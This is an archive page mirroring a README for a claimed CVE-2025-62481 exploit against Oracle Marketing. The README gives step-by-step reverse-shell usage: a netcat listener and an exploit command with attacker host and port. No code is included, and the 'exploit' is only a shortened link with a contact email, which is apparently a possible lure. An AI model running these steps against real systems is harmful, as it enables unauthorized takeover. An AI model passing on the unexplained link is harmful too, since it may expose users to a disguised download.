Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2025-62481 PoC — Oracle E-Business Suite 安全漏洞

Source
https://github.com/callinston/CVE-2025-62481
Associated Vulnerability
Title:Oracle E-Business Suite 安全漏洞 (CVE-2025-62481)
Description:Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks of this vulnerability can result in takeover of Oracle Marketing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Readme
# Oracle Marketing Exploit - CVE-2025-62481

## Overview
This repository contains a proof-of-concept exploit for CVE-2025-62481, a critical vulnerability in Oracle Marketing versions 12.2.3 through 12.2.14. The exploit allows unauthenticated remote attackers to achieve full compromise of the affected system via HTTP, impacting confidentiality, integrity, and availability.


## Requirements
- Python 3.8+
- Libraries: requests, urllib3
- Target: Oracle E-Business Suite with Oracle Marketing 12.2.3-12.2.14 exposed via HTTP/HTTPS
- Network access to the target's port (default 80/443)


## Usage

1. **Install dependencies**
   ```
   pip install -r requirements.txt
   ```
   
2. **Set Up the Listener with Netcat**
   - Install netcat if not already present:
     ```
     sudo apt install netcat # On Debian/Ubuntu
     sudo yum install nc # On CentOS/RHEL
     ```
   - Start the listener on your chosen IP and port. For example, if you specified `--lhost 192.168.1.100` and `--lport 4444` in the exploit:
     ```
     nc -lvnp 4444
     ```
   - The listener will wait for the incoming connection from the target.

3. **Run the Exploit**
   Execute the exploit script with the appropriate arguments, ensuring `--lhost` and `--lport` match the listener’s IP and port:
   ```
   python cve-2025-62481.py --target http://example.com:8080/marketing/admin --lhost 192.168.1.100 --lport 4444
   ```
   The exploit sends a payload to the target, instructing it to connect back to `192.168.1.100:4444`.

4. **Receive the Shell**
   - Once the exploit succeeds, the target system executes the reverse shell payload, connecting to your listener.
   - In the netcat terminal, you’ll see a connection established, and you’ll be presented with a shell prompt (e.g., `bash` or `sh`) from the target system.


## Disclaimer
This tool is for educational and testing purposes only. Use on authorized systems with explicit permission. The author is not responsible for any misuse or damage caused.

## Exploit
[href](https://tinyurl.com/ycye7j8s)

For any inquiries, please email me at: eviedejesu803@gmail.com
File Snapshot

 [4.0K]  /data/pocs/3aac6e1e479efe2b86179983d5ebc8d4980ae059
└── [2.1K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →